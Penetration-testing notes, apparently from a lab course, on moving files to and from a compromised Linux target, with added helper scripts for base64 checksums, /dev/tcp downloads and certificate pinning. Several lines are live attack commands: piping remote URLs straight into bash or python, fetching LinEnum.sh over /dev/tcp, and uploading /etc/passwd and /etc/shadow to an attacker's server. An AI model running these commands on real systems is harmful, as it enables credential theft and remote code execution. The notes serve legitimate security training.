Linux Target
Download Operations (Attacker -> Target)
Base64 Encoding and Decoding
If you have access to a terminal on the target, you can just paste the base64 text into it and decode it.
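Added example (not from the original notes): the full round trip a practitioner types, packing a file into one unwrapped base64 line with its SHA-256 beside it, then decoding on the other side and refusing the result if the digest does not match. A pasted blob is easily damaged by terminal wrapping or a missed line, so the check matters. File names are hypothetical and the sample content is constructed.

```shell
#!/bin/sh
# Added example, not part of the original notes. Base64 through a terminal
# paste is lossy in practice (wrapping, trailing spaces, a missed line), so
# carry the digest alongside the blob and check it after decoding.

# Print two lines: the SHA-256 of the source file, then the file as one
# unwrapped base64 line that can be pasted into a remote shell.
b64_pack() {
  src="$1"
  sha256sum "$src" | awk '{print $1}'
  base64 "$src" | tr -d '\n'
  echo
}

# Decode a base64 blob into $dst and compare its SHA-256 with the expected
# digest. Returns 0 on a match; on mismatch the partial file is removed and
# the function returns 1, so a caller under 'set -e' stops right there.
b64_unpack_verify() {
  expected="$1"; blob="$2"; dst="$3"
  printf '%s' "$blob" | base64 -d > "$dst" 2>/dev/null || true
  actual=$(sha256sum "$dst" | awk '{print $1}')
  if [ "$actual" = "$expected" ]; then
    return 0
  fi
  rm -f "$dst"
  return 1
}

# Stand-alone demo with a constructed sample file in a temp directory.
b64_demo() {
  dir=$(mktemp -d)
  printf 'constructed sample payload\n' > "$dir/sample.txt"
  packed=$(b64_pack "$dir/sample.txt")
  digest=$(printf '%s\n' "$packed" | sed -n 1p)
  blob=$(printf '%s\n' "$packed" | sed -n 2p)
  # On the receiving end this is: echo "$blob" | base64 -d > sample.txt ; sha256sum sample.txt
  if b64_unpack_verify "$digest" "$blob" "$dir/received.txt"; then
    echo "digest ok: $digest"
  else
    echo "digest mismatch, file discarded" >&2
  fi
  rm -rf "$dir"
}

b64_demo
```

The digest travels as the first line and the blob as the second, so both can be pasted together; the receiving side only keeps the decoded file when the SHA-256 matches.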
Web Downloads with Wget and cURL
wget <URL> -O <PATH_OUTPUT>
curl -o <PATH_OUTPUT> <URL>
Fileless
Because of the way Linux works and how pipes operate, most of the tools we use in Linux can be used to replicate fileless operations, which means that we don't have to download a file to execute it.
Fileless Download with cURL
curl <URL> | bash
wget -qO- <URL> | python3
Download with Bash (/dev/tcp)
There may also be situations where none of the well-known file transfer tools are available. As long as Bash version 2.04 or greater is installed (compiled with --enable-net-redirections), the built-in /dev/tcp device file can be used for simple file downloads.
exec 3<>/dev/tcp/10.10.10.32/80
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
cat <&3
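The three lines above work, but everything the server sends, status line and headers included, lands in whatever cat <&3 writes to, so the saved file is not byte-for-byte the original. The helper below is an added example, not from the original notes: it wraps the same /dev/tcp redirection in a function that sends an HTTP/1.0 request (so the server closes the connection and cat reaches EOF), strips the response headers, and writes only the body. strip_http_headers and devtcp_get are hypothetical names; host, port and path are placeholders. The /dev/tcp redirection itself needs Bash.

```shell
#!/usr/bin/env bash
# Added example, not part of the original notes. Bash's /dev/tcp/<host>/<port>
# pseudo-file (needs --enable-net-redirections) gives a raw socket; the
# server answers with HTTP headers before the body, so they must be removed
# before the result is usable as a file.

# Drop everything up to and including the first blank line (CRLF or bare LF),
# which is where the HTTP headers end and the body begins.
strip_http_headers() {
  cr=$(printf '\r')
  sed "1,/^${cr}\{0,1\}\$/d"
}

# Fetch http://$1:$2$3 over /dev/tcp and write only the body to $4.
# HTTP/1.0 plus "Connection: close" makes the server close the socket after
# one response, so 'cat' sees EOF instead of waiting on a keep-alive socket.
devtcp_get() {
  host="$1"; port="$2"; path="$3"; out="$4"
  exec 3<>"/dev/tcp/$host/$port"
  printf 'GET %s HTTP/1.0\r\nHost: %s\r\nConnection: close\r\n\r\n' "$path" "$host" >&3
  cat <&3 | strip_http_headers > "$out"
  exec 3<&-
}

# Usage with the placeholders from the notes above:
#   devtcp_get 10.10.10.32 80 /LinEnum.sh ./LinEnum.sh
# then compare sha256sum ./LinEnum.sh with the digest known on the sending side.
```

Because the body is separated on the first blank line, the function handles both CRLF and LF header terminators; the checksum comparison in the usage note is what tells you the transfer was complete rather than truncated.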
SSH Downloads
On the Attacker machine, install and/or enable SSH:
sudo systemctl enable ssh
sudo systemctl start ssh
On the Target machine:
scp <username>@<IP>:/root/myroot.txt .
Upload Operations (Target -> Attacker)
Web Upload
Same method as for a Windows target: create an HTTP server that accepts uploads:
sudo python3 -m pip install --user uploadserver
We can add a self-signed certificate to it:
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
(The web server should not serve the certificate file itself; create a separate directory for the files the web server will host.)
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
Finally, to upload multiple files in one request, run from the Target machine:
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
We used the option --insecure because the server presents a self-signed certificate that we generated ourselves and that curl cannot verify against its CA store; the flag disables curl's certificate verification entirely.
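With --insecure alone, curl accepts any certificate, including one substituted by a host in the path, so the files would go to whoever answers on that address. Since we generated server.pem ourselves, we can pin the server's public key instead. The helper below is an added example, not from the original notes: it computes the SPKI SHA-256 pin from the PEM the openssl command above produced (and, as a cross-check, from the private key in the same file) and passes it to curl's --pinnedpubkey, which curl still enforces alongside --insecure. spki_pin_sha256, spki_pin_from_key and upload_pinned are hypothetical names; the IP and file paths are the placeholders used in this section.

```shell
#!/bin/sh
# Added example, not part of the original notes. --insecure turns off all
# certificate checks; --pinnedpubkey adds back the one check a self-signed
# setup can satisfy: the server's public key must be exactly the one whose
# PEM we generated ourselves.

# Print the base64 SHA-256 of the SubjectPublicKeyInfo in a PEM certificate,
# the value curl expects after the "sha256//" prefix of --pinnedpubkey.
spki_pin_sha256() {
  pem="$1"
  openssl x509 -in "$pem" -pubkey -noout \
    | openssl pkey -pubin -outform der \
    | openssl dgst -sha256 -binary \
    | openssl base64 -A
}

# The same digest derived from the private key in the PEM; comparing it with
# spki_pin_sha256 confirms the pin before it is carried to the other machine.
spki_pin_from_key() {
  pem="$1"
  openssl pkey -in "$pem" -pubout -outform der \
    | openssl dgst -sha256 -binary \
    | openssl base64 -A
}

# Upload files to the uploadserver instance on $host, accepting the
# self-signed certificate only if its public key hashes to $pin.
# Usage (placeholders): upload_pinned 192.168.49.128 "$(spki_pin_sha256 ~/server.pem)" /etc/passwd
upload_pinned() {
  host="$1"; pin="$2"; shift 2
  # Rotate the remaining arguments into "-F files=@<path>" pairs.
  for f in "$@"; do
    set -- "$@" -F "files=@$f"
    shift
  done
  # --insecure skips chain and hostname checks; --pinnedpubkey still aborts
  # the connection unless the presented key matches $pin.
  curl --insecure --pinnedpubkey "sha256//$pin" -X POST "https://$host/upload" "$@"
}
```

Compute the pin on the Attacker machine where server.pem lives, then carry only the 44-character string to the uploading side; a mismatch means the TLS endpoint is not the server you started.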
Alternative Web File Transfer Method
Since Linux distributions usually have Python or PHP installed, starting a web server to transfer files is straightforward. Also, if the server we compromised is a web server, we can move the files we want to transfer into the web server's document directory and fetch them from the web page, which means that we are downloading the file from our Pwnbox.
python3 -m http.server
python2.7 -m SimpleHTTPServer
php -S 0.0.0.0:8000
ruby -run -ehttpd . -p8000
Then download the file normally from the Attacker machine.
SCP Upload
scp /etc/passwd <username>@<IP>:/home/kali/